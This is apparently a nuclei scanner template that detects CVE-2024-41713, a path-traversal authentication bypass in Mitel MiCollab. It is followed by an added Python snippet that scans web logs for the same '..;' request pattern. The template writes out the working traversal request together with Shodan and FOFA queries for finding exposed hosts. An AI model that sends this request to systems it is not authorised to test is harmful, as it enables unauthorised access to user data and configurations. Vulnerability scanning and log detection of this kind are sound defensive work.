id: CVE-2024-41713

info:
  name: Mitel MiCollab - Authentication Bypass
  author: DhiyaneshDK,watchTowr
  severity: high
  description: |
    A vulnerability in the NuPoint Unified Messaging (NPM) component of Mitel MiCollab through 9.8 SP1 FP2 (9.8.1.201) could allow an unauthenticated attacker to conduct a path traversal attack, due to insufficient input validation. A successful exploit could allow unauthorized access, enabling the attacker to view, corrupt, or delete users' data and system configurations.
  impact: |
    Unauthenticated attackers can exploit path traversal to access sensitive user data, system configurations, and corrupt or delete information.
  remediation: |
    Update Mitel MiCollab to a version later than 9.8 SP1 FP2 that patches CVE-2024-41713.
  reference:
    - https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2024-0029
    - https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/?123
    - https://nvd.nist.gov/vuln/detail/CVE-2024-41713
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-41713
    cwe-id: CWE-22
    epss-score: 0.93912
    epss-percentile: 0.99885
  metadata:
    verified: true
    max-request: 1
    vendor: mitel
    product: cmg_suite
    shodan-query: http.html:"Mitel Networks"
    fofa-query: body="mitel networks"
  tags: cve,cve2024,mitel,cmg-suite,auth-bypass,kev,vkev,vuln

http:
  - raw:
      - |
        GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Available services"
          - "Service Description"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220621f3dbfbaaca6097c9de40768a9c23cbb4c2994544ea3efeeaa5b5c88dd702a02210087e7444c3f29c9a88aaf89149557c904b13586366da8d9d06e880607e8be2c27:922c64590222798bb761d5b6d8e72950
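
For defenders reviewing web server logs on a MiCollab host, the following added example (not part of the template or of any Mitel or nuclei code) flags requests whose path contains a `..;` segment, the pattern this template's request uses. The combined log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Request line and status inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def has_dotdot_param_segment(target: str) -> bool:
    """True if a path segment is '..' carrying a ';' path-parameter suffix."""
    path = target.split("?", 1)[0]
    # Decode twice so percent-encoded and double-encoded paths are canonicalised.
    for _ in range(2):
        path = unquote(path)
    for segment in path.split("/"):
        name = segment.split(";", 1)[0]
        if name == ".." and ";" in segment:
            return True
    return False


def find_traversal_requests(lines):
    """Return (line_number, target, status) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and has_dotdot_param_segment(match.group("target")):
            hits.append((number, match.group("target"), int(match.group("status"))))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Dec/2024:10:00:01 +0000] "GET /npm-pwg/ HTTP/1.1" 200 5120',
    '192.0.2.44 - - [05/Dec/2024:10:00:07 +0000] '
    '"GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1" 200 3310',
    '192.0.2.10 - - [05/Dec/2024:10:00:12 +0000] '
    '"GET /index.html;jsessionid=ABC123 HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for number, target, status in find_traversal_requests(SAMPLE_LOG):
        print(f"line {number}: status {status}: {target}")
```

A hit with status 200 corresponds to what the template's matchers look for and is the case to triage first; ordinary `;jsessionid=` parameters are not flagged.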